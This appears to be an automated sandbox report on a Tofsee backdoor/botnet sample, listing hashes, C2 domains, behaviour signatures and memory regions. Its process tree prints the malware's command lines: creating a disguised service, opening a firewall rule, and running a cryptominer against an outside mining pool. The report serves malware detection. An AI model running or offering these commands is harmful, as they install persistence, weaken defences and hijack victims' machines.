Overview

overview

10

Static

static

dridex

windows10-1703-x64

10

Analysis

  • max time kernel
    33s
  • max time network
    60s
  • platform
    windows10-1703_x64
  • resource
    win10-20220812-en
  • resource tags

    arch:x64arch:x86image:win10-20220812-enlocale:en-usos:windows10-1703-x64system
  • submitted
    28-10-2022 21:28

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    770ad0a1aed7298166f4f22150a64fe1af49703506002bb16bb5eb8fb5b9d980.exe

  • Size

    260KB

  • MD5

    32a0c50370e88cd274964acd32d2b201

  • SHA1

    9fe6f92ba1cb6289eb280b7e21e7c0f985b6666a

  • SHA256

    770ad0a1aed7298166f4f22150a64fe1af49703506002bb16bb5eb8fb5b9d980

  • SHA512

    36bd13d425361bc8f83d384bafbc0d225d57bfd24d31705ac6e8b08c3fd2f111241a834eaf07b16bc5f9b3c7b395e00fc5fb164033341ee1439daae55e239cd9

  • SSDEEP

    3072:3jMvBpGl8HLnr7BWz5KBqz7umHSZFLNTevQUwIse9U6BPLR7BxM/h3:4vBE+HLr7lqf7WRevaGLPLRNx

Score
10/10
tofseeevasionpersistencetrojan

Malware Config

Extracted

Family

tofsee

C2

svartalfheim.top

jotunheim.name

Signatures

  • Tofsee

    Backdoor/botnet which carries out malicious activities based on commands from a C2 server.

    trojantofsee
  • Creates new service(s) 1 TTPs
    persistence
  • Executes dropped EXE 1 IoCs
  • Modifies Windows Firewall 1 TTPs 1 IoCs
    evasion
  • Sets service image path in registry 2 TTPs 1 IoCs
    persistence
  • Deletes itself 1 IoCs
  • Drops file in System32 directory 1 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Launches sc.exe 3 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Modifies data under HKEY_USERS 2 IoCs
  • Suspicious use of WriteProcessMemory 23 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\770ad0a1aed7298166f4f22150a64fe1af49703506002bb16bb5eb8fb5b9d980.exe
    "C:\Users\Admin\AppData\Local\Temp\770ad0a1aed7298166f4f22150a64fe1af49703506002bb16bb5eb8fb5b9d980.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:3036
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\hlfvdnqx\
      2⤵
        PID:4872
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\gaqhkilu.exe" C:\Windows\SysWOW64\hlfvdnqx\
        2⤵
          PID:4284
        • C:\Windows\SysWOW64\sc.exe
          "C:\Windows\System32\sc.exe" create hlfvdnqx binPath= "C:\Windows\SysWOW64\hlfvdnqx\gaqhkilu.exe /d\"C:\Users\Admin\AppData\Local\Temp\770ad0a1aed7298166f4f22150a64fe1af49703506002bb16bb5eb8fb5b9d980.exe\"" type= own start= auto DisplayName= "wifi support"
          2⤵
          • Launches sc.exe
          PID:3536
        • C:\Windows\SysWOW64\sc.exe
          "C:\Windows\System32\sc.exe" description hlfvdnqx "wifi internet conection"
          2⤵
          • Launches sc.exe
          PID:1228
        • C:\Windows\SysWOW64\sc.exe
          "C:\Windows\System32\sc.exe" start hlfvdnqx
          2⤵
          • Launches sc.exe
          PID:4112
        • C:\Windows\SysWOW64\netsh.exe
          "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
          2⤵
          • Modifies Windows Firewall
          PID:3372
      • C:\Windows\SysWOW64\hlfvdnqx\gaqhkilu.exe
        C:\Windows\SysWOW64\hlfvdnqx\gaqhkilu.exe /d"C:\Users\Admin\AppData\Local\Temp\770ad0a1aed7298166f4f22150a64fe1af49703506002bb16bb5eb8fb5b9d980.exe"
        1⤵
        • Executes dropped EXE
        • Suspicious use of SetThreadContext
        • Suspicious use of WriteProcessMemory
        PID:4832
        • C:\Windows\SysWOW64\svchost.exe
          svchost.exe
          2⤵
          • Sets service image path in registry
          • Deletes itself
          • Drops file in System32 directory
          • Modifies data under HKEY_USERS
          PID:2276
          • C:\Windows\SysWOW64\svchost.exe
            svchost.exe -o fastpool.xyz:10060 -u 9mLwUkiK8Yp89zQQYodWKN29jVVVz1cWDFZctWxge16Zi3TpHnSBnnVcCDhSRXdesnMBdVjtDwh1N71KD9z37EzgKSM1tmS.60000 -p x -k -a cn/half
            3⤵
              PID:2028

        Network

        MITRE ATT&CK Enterprise v6

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\Users\Admin\AppData\Local\Temp\gaqhkilu.exe
          Filesize

          923KB

          MD5

          91df88c47aa393f051c0ba8e2df2cdd8

          SHA1

          29c22b0393b7fb43ae82dec3d95e1e6d7efd97f4

          SHA256

          761f673c47dafb70eab6e6f9f2ea86f40a173d9ccc057b4052d50cb9e2f3be39

          SHA512

          79109dc5de06d1bb7ca5f5d7c757d45970e05072e63f42597aacaef7b1e9d53feae84bb5ec5f6ea8cb4b593e1d001160819ad395666788088bd6d6576f2309c1

          Download Submit

        • C:\Windows\SysWOW64\hlfvdnqx\gaqhkilu.exe
          Filesize

          923KB

          MD5

          91df88c47aa393f051c0ba8e2df2cdd8

          SHA1

          29c22b0393b7fb43ae82dec3d95e1e6d7efd97f4

          SHA256

          761f673c47dafb70eab6e6f9f2ea86f40a173d9ccc057b4052d50cb9e2f3be39

          SHA512

          79109dc5de06d1bb7ca5f5d7c757d45970e05072e63f42597aacaef7b1e9d53feae84bb5ec5f6ea8cb4b593e1d001160819ad395666788088bd6d6576f2309c1

          Download Submit

        • memory/1228-190-0x0000000000000000-mapping.dmp

          Download

        • memory/2028-517-0x0000000000B9259C-mapping.dmp

          Download

        • memory/2276-482-0x00000000004C0000-0x00000000004D5000-memory.dmp

          Filesize

          84KB

          Download

        • memory/2276-481-0x00000000004C0000-0x00000000004D5000-memory.dmp

          Filesize

          84KB

          Download

        • memory/2276-428-0x00000000004C9A6B-mapping.dmp

          Download

        • memory/3036-139-0x0000000076FB0000-0x000000007713E000-memory.dmp

          Filesize

          1.6MB

          Download

        • memory/3036-153-0x0000000076FB0000-0x000000007713E000-memory.dmp

          Filesize

          1.6MB

          Download

        • memory/3036-124-0x0000000076FB0000-0x000000007713E000-memory.dmp

          Filesize

          1.6MB

          Download

        • memory/3036-125-0x0000000076FB0000-0x000000007713E000-memory.dmp

          Filesize

          1.6MB

          Download

        • memory/3036-128-0x0000000076FB0000-0x000000007713E000-memory.dmp

          Filesize

          1.6MB

          Download

        • memory/3036-129-0x0000000076FB0000-0x000000007713E000-memory.dmp

          Filesize

          1.6MB

          Download

        • memory/3036-126-0x0000000076FB0000-0x000000007713E000-memory.dmp

          Filesize

          1.6MB

          Download

        • memory/3036-127-0x0000000076FB0000-0x000000007713E000-memory.dmp

          Filesize

          1.6MB

          Download

        • memory/3036-131-0x0000000076FB0000-0x000000007713E000-memory.dmp

          Filesize

          1.6MB

          Download

        • memory/3036-132-0x0000000076FB0000-0x000000007713E000-memory.dmp

          Filesize

          1.6MB

          Download

        • memory/3036-135-0x0000000076FB0000-0x000000007713E000-memory.dmp

          Filesize

          1.6MB

          Download

        • memory/3036-134-0x0000000076FB0000-0x000000007713E000-memory.dmp

          Filesize

          1.6MB

          Download

        • memory/3036-136-0x0000000076FB0000-0x000000007713E000-memory.dmp

          Filesize

          1.6MB

          Download

        • memory/3036-138-0x0000000076FB0000-0x000000007713E000-memory.dmp

          Filesize

          1.6MB

          Download

        • memory/3036-140-0x0000000076FB0000-0x000000007713E000-memory.dmp

          Filesize

          1.6MB

          Download

        • memory/3036-159-0x0000000076FB0000-0x000000007713E000-memory.dmp

          Filesize

          1.6MB

          Download

        • memory/3036-143-0x0000000076FB0000-0x000000007713E000-memory.dmp

          Filesize

          1.6MB

          Download

        • memory/3036-146-0x0000000076FB0000-0x000000007713E000-memory.dmp

          Filesize

          1.6MB

          Download

        • memory/3036-145-0x0000000076FB0000-0x000000007713E000-memory.dmp

          Filesize

          1.6MB

          Download

        • memory/3036-148-0x0000000076FB0000-0x000000007713E000-memory.dmp

          Filesize

          1.6MB

          Download

        • memory/3036-150-0x0000000076FB0000-0x000000007713E000-memory.dmp

          Filesize

          1.6MB

          Download

        • memory/3036-149-0x0000000076FB0000-0x000000007713E000-memory.dmp

          Filesize

          1.6MB

          Download

        • memory/3036-151-0x0000000076FB0000-0x000000007713E000-memory.dmp

          Filesize

          1.6MB

          Download

        • memory/3036-152-0x0000000076FB0000-0x000000007713E000-memory.dmp

          Filesize

          1.6MB

          Download

        • memory/3036-147-0x0000000076FB0000-0x000000007713E000-memory.dmp

          Filesize

          1.6MB

          Download

        • memory/3036-123-0x0000000076FB0000-0x000000007713E000-memory.dmp

          Filesize

          1.6MB

          Download

        • memory/3036-155-0x0000000076FB0000-0x000000007713E000-memory.dmp

          Filesize

          1.6MB

          Download

        • memory/3036-154-0x0000000076FB0000-0x000000007713E000-memory.dmp

          Filesize

          1.6MB

          Download

        • memory/3036-144-0x0000000076FB0000-0x000000007713E000-memory.dmp

          Filesize

          1.6MB

          Download

        • memory/3036-156-0x0000000076FB0000-0x000000007713E000-memory.dmp

          Filesize

          1.6MB

          Download

        • memory/3036-157-0x0000000076FB0000-0x000000007713E000-memory.dmp

          Filesize

          1.6MB

          Download

        • memory/3036-158-0x0000000002D40000-0x0000000002E8A000-memory.dmp

          Filesize

          1.3MB

          Download

        • memory/3036-142-0x0000000076FB0000-0x000000007713E000-memory.dmp

          Filesize

          1.6MB

          Download

        • memory/3036-122-0x0000000076FB0000-0x000000007713E000-memory.dmp

          Filesize

          1.6MB

          Download

        • memory/3036-137-0x0000000076FB0000-0x000000007713E000-memory.dmp

          Filesize

          1.6MB

          Download

        • memory/3036-133-0x0000000076FB0000-0x000000007713E000-memory.dmp

          Filesize

          1.6MB

          Download

        • memory/3036-141-0x0000000076FB0000-0x000000007713E000-memory.dmp

          Filesize

          1.6MB

          Download

        • memory/3036-161-0x0000000076FB0000-0x000000007713E000-memory.dmp

          Filesize

          1.6MB

          Download

        • memory/3036-116-0x0000000076FB0000-0x000000007713E000-memory.dmp

          Filesize

          1.6MB

          Download

        • memory/3036-162-0x0000000076FB0000-0x000000007713E000-memory.dmp

          Filesize

          1.6MB

          Download

        • memory/3036-163-0x0000000076FB0000-0x000000007713E000-memory.dmp

          Filesize

          1.6MB

          Download

        • memory/3036-165-0x0000000000400000-0x0000000002C2F000-memory.dmp

          Filesize

          40.2MB

          Download

        • memory/3036-164-0x0000000076FB0000-0x000000007713E000-memory.dmp

          Filesize

          1.6MB

          Download

        • memory/3036-117-0x0000000076FB0000-0x000000007713E000-memory.dmp

          Filesize

          1.6MB

          Download

        • memory/3036-118-0x0000000076FB0000-0x000000007713E000-memory.dmp

          Filesize

          1.6MB

          Download

        • memory/3036-119-0x0000000076FB0000-0x000000007713E000-memory.dmp

          Filesize

          1.6MB

          Download

        • memory/3036-232-0x0000000000400000-0x0000000002C2F000-memory.dmp

          Filesize

          40.2MB

          Download

        • memory/3036-121-0x0000000076FB0000-0x000000007713E000-memory.dmp

          Filesize

          1.6MB

          Download

        • memory/3036-120-0x0000000076FB0000-0x000000007713E000-memory.dmp

          Filesize

          1.6MB

          Download

        • memory/3036-160-0x0000000076FB0000-0x000000007713E000-memory.dmp

          Filesize

          1.6MB

          Download

        • memory/3372-227-0x0000000000000000-mapping.dmp

          Download

        • memory/3536-186-0x0000000076FB0000-0x000000007713E000-memory.dmp

          Filesize

          1.6MB

          Download

        • memory/3536-183-0x0000000076FB0000-0x000000007713E000-memory.dmp

          Filesize

          1.6MB

          Download

        • memory/3536-184-0x0000000076FB0000-0x000000007713E000-memory.dmp

          Filesize

          1.6MB

          Download

        • memory/3536-185-0x0000000076FB0000-0x000000007713E000-memory.dmp

          Filesize

          1.6MB

          Download

        • memory/3536-182-0x0000000076FB0000-0x000000007713E000-memory.dmp

          Filesize

          1.6MB

          Download

        • memory/3536-180-0x0000000076FB0000-0x000000007713E000-memory.dmp

          Filesize

          1.6MB

          Download

        • memory/3536-179-0x0000000000000000-mapping.dmp

          Download

        • memory/3536-181-0x0000000076FB0000-0x000000007713E000-memory.dmp

          Filesize

          1.6MB

          Download

        • memory/4112-201-0x0000000000000000-mapping.dmp

          Download

        • memory/4284-176-0x0000000076FB0000-0x000000007713E000-memory.dmp

          Filesize

          1.6MB

          Download

        • memory/4284-177-0x0000000076FB0000-0x000000007713E000-memory.dmp

          Filesize

          1.6MB

          Download

        • memory/4284-174-0x0000000076FB0000-0x000000007713E000-memory.dmp

          Filesize

          1.6MB

          Download

        • memory/4284-172-0x0000000000000000-mapping.dmp

          Download

        • memory/4284-173-0x0000000076FB0000-0x000000007713E000-memory.dmp

          Filesize

          1.6MB

          Download

        • memory/4284-175-0x0000000076FB0000-0x000000007713E000-memory.dmp

          Filesize

          1.6MB

          Download

        • memory/4832-432-0x0000000002F70000-0x0000000002F83000-memory.dmp

          Filesize

          76KB

          Download

        • memory/4832-440-0x0000000000400000-0x0000000002C2F000-memory.dmp

          Filesize

          40.2MB

          Download

        • memory/4832-429-0x0000000002FCD000-0x0000000002FE3000-memory.dmp

          Filesize

          88KB

          Download

        • memory/4872-166-0x0000000000000000-mapping.dmp

          Download

        • memory/4872-167-0x0000000076FB0000-0x000000007713E000-memory.dmp

          Filesize

          1.6MB

          Download

        • memory/4872-169-0x0000000076FB0000-0x000000007713E000-memory.dmp

          Filesize

          1.6MB

          Download

        • memory/4872-170-0x0000000076FB0000-0x000000007713E000-memory.dmp

          Filesize

          1.6MB

          Download

        • memory/4872-171-0x0000000076FB0000-0x000000007713E000-memory.dmp

          Filesize

          1.6MB

          Download

        • memory/4872-168-0x0000000076FB0000-0x000000007713E000-memory.dmp

          Filesize

          1.6MB

          Download